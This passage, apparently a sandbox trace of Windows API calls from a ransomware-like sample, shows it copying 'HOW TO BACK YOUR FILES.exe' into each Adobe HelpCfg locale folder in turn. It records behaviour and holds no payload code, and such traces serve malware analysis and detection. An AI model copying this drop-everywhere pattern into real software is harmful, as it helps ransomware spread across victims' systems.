ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53982400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53982400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.195] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.195] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.195] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO" [0057.195] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3238 | out: hHeap=0x2b0000) returned 1 [0057.195] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2360 | out: hHeap=0x2b0000) returned 1 [0057.195] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO") returned 55 [0057.195] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO" [0057.195] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.195] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ro_ro\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.200] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.200] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ro_RO\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53982400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53982400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.200] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.200] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.200] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR" [0057.200] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0057.200] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d22e0 | out: hHeap=0x2b0000) returned 1 [0057.200] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR") returned 55 [0057.200] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR" [0057.200] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.201] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\pt_br\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.206] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.206] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x539a8560, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x539a8560, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.206] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.206] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.206] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL" [0057.206] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0057.206] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2340 | out: hHeap=0x2b0000) returned 1 [0057.206] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL") returned 55 [0057.206] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL" [0057.206] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.206] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\pl_pl\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.211] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.211] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x539a8560, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x539a8560, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.212] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.212] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.212] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL" [0057.212] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0057.212] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2280 | out: hHeap=0x2b0000) returned 1 [0057.212] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL") returned 55 [0057.212] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL" [0057.212] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.212] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\nl_nl\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.217] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.217] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x539a8560, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x539a8560, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.217] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.217] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.217] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO" [0057.217] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0057.217] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0057.217] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO") returned 55 [0057.218] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO" [0057.218] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.218] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\nb_no\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.223] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.223] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5a6660, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x539ce6c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x539ce6c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.223] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.223] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.223] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR" [0057.223] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0057.223] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2240 | out: hHeap=0x2b0000) returned 1 [0057.224] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR") returned 55 [0057.224] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR" [0057.224] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.224] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ko_kr\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.228] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.228] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5a6660, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x539ce6c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x539ce6c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.228] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.228] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.229] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP" [0057.229] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0057.229] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0057.229] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP") returned 55 [0057.229] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP" [0057.229] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.229] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ja_jp\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.234] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.234] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5a6660, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x539ce6c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x539ce6c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.234] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.234] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.234] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT" [0057.234] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0057.234] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c08 | out: hHeap=0x2b0000) returned 1 [0057.234] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT") returned 55 [0057.234] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT" [0057.234] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.234] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\it_it\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.239] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.239] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\it_IT\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5a6660, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x539f4820, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x539f4820, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.239] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.239] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.239] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU" [0057.239] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb388 | out: hHeap=0x2b0000) returned 1 [0057.239] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c48 | out: hHeap=0x2b0000) returned 1 [0057.239] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU") returned 55 [0057.240] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU" [0057.240] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.240] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\hu_hu\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.244] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.244] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hu_HU\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x539f4820, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x539f4820, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.244] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.244] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.245] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR" [0057.245] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0057.245] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c68 | out: hHeap=0x2b0000) returned 1 [0057.245] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR") returned 55 [0057.245] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR" [0057.245] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.245] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\hr_hr\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.250] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.250] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x539f4820, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x539f4820, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.250] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.250] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.250] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR" [0057.250] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6048 | out: hHeap=0x2b0000) returned 1 [0057.250] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c88 | out: hHeap=0x2b0000) returned 1 [0057.250] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR") returned 55 [0057.250] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR" [0057.250] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.251] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\fr_fr\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.255] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.255] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53a1a980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53a1a980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.255] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.255] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.256] lstrcpynW (in: 